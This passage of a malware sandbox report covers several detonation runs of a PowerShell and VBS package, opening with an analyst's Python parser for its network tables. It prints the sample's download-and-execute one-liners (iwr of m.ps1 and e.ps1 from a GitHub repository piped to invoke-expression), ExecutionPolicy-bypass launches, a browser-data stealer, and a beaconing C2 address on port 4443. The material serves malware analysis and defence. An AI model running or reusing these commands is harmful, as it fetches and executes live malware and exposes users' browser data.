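my choices.

```python
from collections import Counter

# Rows copied from the behavioral8 Network table above (a subset, not constructed).
NETWORK_EXCERPT = """
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| IN | 64.227.161.180:4443 |  | tcp |
| US | 8.8.8.8:53 | 7.98.22.2.in-addr.arpa | udp |
| IN | 64.227.161.180:4443 |  | tcp |
| IN | 64.227.161.180:4443 |  | tcp |
| IN | 64.227.161.180:4443 |  | tcp |
| IN | 64.227.161.180:4443 |  | tcp |
| IN | 64.227.161.180:4443 |  | tcp |
| IN | 64.227.161.180:4443 | tcp |
"""

PTR_SUFFIX = (".in-addr.arpa", ".ip6.arpa")


def parse_network_table(text):
    """One dict per data row; the Proto cell is located by value so a missing Domain cell is tolerated."""
    rows = []
    for raw in text.strip().splitlines():
        cells = [c.strip() for c in raw.strip().strip("|").split("|")]
        if len(cells) < 3 or cells[0] == "Country":
            continue
        tail = cells[2:]
        proto = next((c for c in tail if c.lower() in ("tcp", "udp")), "")
        domain = next((c for c in tail if c and c != proto and c.upper() != "N/A"), "")
        host, _, port = cells[1].rpartition(":")
        rows.append({"country": cells[0], "host": host, "port": int(port),
                     "domain": domain, "proto": proto.lower()})
    return rows


def is_ptr_noise(row):
    """Reverse lookups the Windows guest issues for peer IPs; not attacker activity."""
    return row["proto"] == "udp" and row["port"] == 53 and row["domain"].endswith(PTR_SUFFIX)


def direct_ip_beacons(rows, min_hits=3):
    """TCP connections to a bare IP (no resolved name) on a non-web port, seen min_hits or more times."""
    counts = Counter((r["host"], r["port"]) for r in rows
                     if r["proto"] == "tcp" and not r["domain"] and r["port"] not in (80, 443))
    return [(f"{h}:{p}", n) for (h, p), n in counts.most_common() if n >= min_hits]


def destinations(rows):
    """Unique TCP destinations with the name that resolved to them, PTR noise removed."""
    out = {}
    for r in rows:
        if r["proto"] == "tcp" and not is_ptr_noise(r):
            out.setdefault(f'{r["host"]}:{r["port"]}', r["domain"] or "<direct IP>")
    return out


if __name__ == "__main__":
    rows = parse_network_table(NETWORK_EXCERPT)
    print("PTR noise rows:", sum(is_ptr_noise(r) for r in rows))
    print("destinations:", destinations(rows))
    print("direct-IP beacons:", direct_ip_beacons(rows))
```

The two destinations this leaves are raw.githubusercontent.com, which served m.ps1, and the bare IP on 4443. Block the latter outright; treat the former as this campaign's staging host (the repository path, not the domain, is the indicator), since blocking raw.githubusercontent.com as a whole breaks legitimate traffic.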
Files
memory/4744-0-0x00007FFE43D43000-0x00007FFE43D45000-memory.dmp
memory/4744-6-0x000001F6B9E50000-0x000001F6B9E72000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mrz2raz5.qay.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4744-11-0x00007FFE43D40000-0x00007FFE44801000-memory.dmp
memory/4744-12-0x00007FFE43D40000-0x00007FFE44801000-memory.dmp
memory/4744-13-0x000001F6BCC30000-0x000001F6BD3D6000-memory.dmp
memory/4744-15-0x00007FFE43D43000-0x00007FFE43D45000-memory.dmp
memory/4744-16-0x00007FFE43D40000-0x00007FFE44801000-memory.dmp
memory/4744-17-0x00007FFE43D40000-0x00007FFE44801000-memory.dmp
memory/4744-18-0x00007FFE43D40000-0x00007FFE44801000-memory.dmp
Analysis: behavioral9
Detonation Overview
Submitted
2025-01-17 06:15
Reported
2025-01-17 06:17
Platform
win7-20240903-en
Max time kernel
118s
Max time network
119s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\i965652f-main\grab.ps1
Network
Files
memory/2072-4-0x000007FEF5FDE000-0x000007FEF5FDF000-memory.dmp
memory/2072-5-0x000000001B820000-0x000000001BB02000-memory.dmp
memory/2072-6-0x0000000001EF0000-0x0000000001EF8000-memory.dmp
memory/2072-7-0x000007FEF5D20000-0x000007FEF66BD000-memory.dmp
memory/2072-8-0x000007FEF5D20000-0x000007FEF66BD000-memory.dmp
memory/2072-9-0x000007FEF5D20000-0x000007FEF66BD000-memory.dmp
memory/2072-11-0x000007FEF5D20000-0x000007FEF66BD000-memory.dmp
memory/2072-10-0x000007FEF5D20000-0x000007FEF66BD000-memory.dmp
Analysis: behavioral12
Detonation Overview
Submitted
2025-01-17 06:15
Reported
2025-01-17 06:17
Platform
win10v2004-20241007-en
Max time kernel
149s
Max time network
150s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\i965652f-main\m.ps1
Network
| Country | Destination | Domain | Proto |
| IN | 64.227.161.180:4443 |  | tcp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 7.98.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| IN | 64.227.161.180:4443 |  | tcp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 85.49.80.91.in-addr.arpa | udp |
| IN | 64.227.161.180:4443 |  | tcp |
| US | 8.8.8.8:53 | 180.129.81.91.in-addr.arpa | udp |
| IN | 64.227.161.180:4443 |  | tcp |
| US | 8.8.8.8:53 | 181.129.81.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| IN | 64.227.161.180:4443 |  | tcp |
| IN | 64.227.161.180:4443 |  | tcp |
| US | 8.8.8.8:53 | 34.197.79.40.in-addr.arpa | udp |
Files
memory/4472-0-0x00007FFCD9873000-0x00007FFCD9875000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_42ttdnm0.inb.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4472-10-0x000001C9EFD50000-0x000001C9EFD72000-memory.dmp
memory/4472-11-0x00007FFCD9870000-0x00007FFCDA331000-memory.dmp
memory/4472-12-0x00007FFCD9870000-0x00007FFCDA331000-memory.dmp
memory/4472-13-0x00007FFCD9870000-0x00007FFCDA331000-memory.dmp
memory/4472-14-0x00007FFCD9870000-0x00007FFCDA331000-memory.dmp
memory/4472-15-0x00007FFCD9870000-0x00007FFCDA331000-memory.dmp
Analysis: behavioral14
Detonation Overview
Submitted
2025-01-17 06:15
Reported
2025-01-17 06:17
Platform
win10v2004-20241007-en
Max time kernel
140s
Max time network
147s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3240 wrote to memory of 1672 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 3240 wrote to memory of 1672 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\i965652f-main\svhost.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "$script = iwr http://raw.githubusercontent.com/k53xupn43/i965652f/refs/heads/main/m.ps1; invoke-expression $script"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.110.133:80 | raw.githubusercontent.com | tcp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| IN | 64.227.161.180:4443 |  | tcp |
| US | 8.8.8.8:53 | 20.49.80.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 7.98.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| IN | 64.227.161.180:4443 |  | tcp |
| US | 8.8.8.8:53 | 197.87.175.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| IN | 64.227.161.180:4443 |  | tcp |
| IN | 64.227.161.180:4443 |  | tcp |
| US | 8.8.8.8:53 | 8.153.16.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| IN | 64.227.161.180:4443 |  | tcp |
| IN | 64.227.161.180:4443 |  | tcp |
| IN | 64.227.161.180:4443 |  | tcp |
Files
memory/1672-0-0x00007FFB39E23000-0x00007FFB39E25000-memory.dmp
memory/1672-7-0x000001D0618F0000-0x000001D061912000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2oi2u0te.pny.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1672-11-0x00007FFB39E20000-0x00007FFB3A8E1000-memory.dmp
memory/1672-12-0x00007FFB39E20000-0x00007FFB3A8E1000-memory.dmp
memory/1672-13-0x000001D07B550000-0x000001D07BCF6000-memory.dmp
memory/1672-15-0x00007FFB39E23000-0x00007FFB39E25000-memory.dmp
memory/1672-16-0x00007FFB39E20000-0x00007FFB3A8E1000-memory.dmp
Analysis: behavioral11
Detonation Overview
Submitted
2025-01-17 06:15
Reported
2025-01-17 06:17
Platform
win7-20240708-en
Max time kernel
134s
Max time network
136s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\i965652f-main\m.ps1
Network
| Country | Destination | Domain | Proto |
| IN | 64.227.161.180:4443 |  | tcp |
| IN | 64.227.161.180:4443 |  | tcp |
| IN | 64.227.161.180:4443 |  | tcp |
| IN | 64.227.161.180:4443 |  | tcp |
| IN | 64.227.161.180:4443 |  | tcp |
| IN | 64.227.161.180:4443 |  | tcp |
| IN | 64.227.161.180:4443 |  | tcp |
Files
memory/1500-4-0x000007FEF5D2E000-0x000007FEF5D2F000-memory.dmp
memory/1500-5-0x000000001B6C0000-0x000000001B9A2000-memory.dmp
memory/1500-7-0x000007FEF5A70000-0x000007FEF640D000-memory.dmp
memory/1500-6-0x00000000022A0000-0x00000000022A8000-memory.dmp
memory/1500-8-0x000007FEF5A70000-0x000007FEF640D000-memory.dmp
memory/1500-10-0x000007FEF5A70000-0x000007FEF640D000-memory.dmp
memory/1500-9-0x000007FEF5A70000-0x000007FEF640D000-memory.dmp
memory/1500-11-0x000007FEF5A70000-0x000007FEF640D000-memory.dmp
memory/1500-12-0x000007FEF5D2E000-0x000007FEF5D2F000-memory.dmp
memory/1500-13-0x000007FEF5A70000-0x000007FEF640D000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2025-01-17 06:15
Reported
2025-01-17 06:17
Platform
win7-20240729-en
Max time kernel
121s
Max time network
122s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\i965652f-main\bdata.exe
"C:\Users\Admin\AppData\Local\Temp\i965652f-main\bdata.exe"
Network
Files
Analysis: behavioral4
Detonation Overview
Submitted
2025-01-17 06:15
Reported
2025-01-17 06:17
Platform
win10v2004-20241007-en
Max time kernel
95s
Max time network
138s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\i965652f-main\e.ps1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 7.98.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.49.80.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
Files
memory/4388-0-0x00007FFF66363000-0x00007FFF66365000-memory.dmp
memory/4388-1-0x000001459B590000-0x000001459B5B2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zox3i0nt.io2.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4388-11-0x00007FFF66360000-0x00007FFF66E21000-memory.dmp
memory/4388-12-0x00007FFF66360000-0x00007FFF66E21000-memory.dmp
memory/4388-15-0x00007FFF66360000-0x00007FFF66E21000-memory.dmp
Analysis: behavioral5
Detonation Overview
Submitted
2025-01-17 06:15
Reported
2025-01-17 06:17
Platform
win7-20240903-en
Max time kernel
121s
Max time network
122s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2672 wrote to memory of 2584 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2672 wrote to memory of 2584 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2672 wrote to memory of 2584 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\i965652f-main\exclude.ps1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command $pl = iwr https://raw.githubusercontent.com/k53xupn43/i965652f/refs/heads/main/e.ps1; invoke-expression $pl
Network
Files
memory/2672-4-0x000007FEF5CEE000-0x000007FEF5CEF000-memory.dmp
memory/2672-5-0x000000001B5C0000-0x000000001B8A2000-memory.dmp
memory/2672-7-0x000007FEF5A30000-0x000007FEF63CD000-memory.dmp
memory/2672-8-0x000007FEF5A30000-0x000007FEF63CD000-memory.dmp
memory/2672-6-0x0000000001DA0000-0x0000000001DA8000-memory.dmp
memory/2672-9-0x000007FEF5A30000-0x000007FEF63CD000-memory.dmp
memory/2672-10-0x000007FEF5A30000-0x000007FEF63CD000-memory.dmp
memory/2672-11-0x000007FEF5A30000-0x000007FEF63CD000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 15949652452d63a0038444a725cc7945 |
| SHA1 | a3da3f48ae9ef882ec9cb2b089684a7aa755ebe6 |
| SHA256 | ecb4c8f2a83ee45e03f6c591ed6b20ee244d80429b43b66317dd59677c14eb2c |
| SHA512 | 4be22050b6bc257c842b85d14f5bc01d2487344b815f328a7139ade6895215799ed5750b6fbf14d8dbdfac4b8f9b8f85dd46d9c7564163349d1cfcb2edbcd2ce |
memory/2584-18-0x000007FEF5A30000-0x000007FEF63CD000-memory.dmp
memory/2672-17-0x000007FEF5A30000-0x000007FEF63CD000-memory.dmp
memory/2584-19-0x000007FEF5A30000-0x000007FEF63CD000-memory.dmp
Analysis: behavioral6
Detonation Overview
Submitted
2025-01-17 06:15
Reported
2025-01-17 06:17
Platform
win10v2004-20241007-en
Max time kernel
92s
Max time network
124s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3424 wrote to memory of 2460 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 3424 wrote to memory of 2460 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\i965652f-main\exclude.ps1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command $pl = iwr https://raw.githubusercontent.com/k53xupn43/i965652f/refs/heads/main/e.ps1; invoke-expression $pl
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 7.98.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
Files
memory/3424-0-0x00007FFA89BB3000-0x00007FFA89BB5000-memory.dmp
memory/3424-10-0x000001533F760000-0x000001533F782000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wv4zzno4.he4.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3424-11-0x00007FFA89BB0000-0x00007FFA8A671000-memory.dmp
memory/3424-12-0x00007FFA89BB0000-0x00007FFA8A671000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 6cf293cb4d80be23433eecf74ddb5503 |
| SHA1 | 24fe4752df102c2ef492954d6b046cb5512ad408 |
| SHA256 | b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8 |
| SHA512 | 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00 |
memory/2460-17-0x00007FFA89BB0000-0x00007FFA8A671000-memory.dmp
memory/3424-16-0x00007FFA89BB0000-0x00007FFA8A671000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 83449265ddea29564af2cefc93493459 |
| SHA1 | 8068c5f88cf4ba3e5f10fa864461c72f9d368d4d |
| SHA256 | 26ce8143a8c7ba0a96779bdacab1ee547b89840abd1d1cb4a8d8b2d99d72e8e9 |
| SHA512 | 89b342aa6fd4a83ed99f6030b1e7bffb63c8ee3eddbba7324e5a265a1968536c4de28e42ecdee13566ef2c3904cfc3ecb7bd33d58d2d3b5d6c7f0ae476203e9d |
memory/2460-28-0x00007FFA89BB0000-0x00007FFA8A671000-memory.dmp
memory/2460-29-0x00000172AA730000-0x00000172AAED6000-memory.dmp
memory/2460-32-0x00007FFA89BB0000-0x00007FFA8A671000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2025-01-17 06:15
Reported
2025-01-17 06:17
Platform
win10v2004-20241007-en
Max time kernel
93s
Max time network
151s
Command Line
Signatures
Reads user/profile data of web browsers
Browser Information Discovery
Processes
C:\Users\Admin\AppData\Local\Temp\i965652f-main\bdata.exe
"C:\Users\Admin\AppData\Local\Temp\i965652f-main\bdata.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 7.98.22.2.in-addr.arpa | udp |
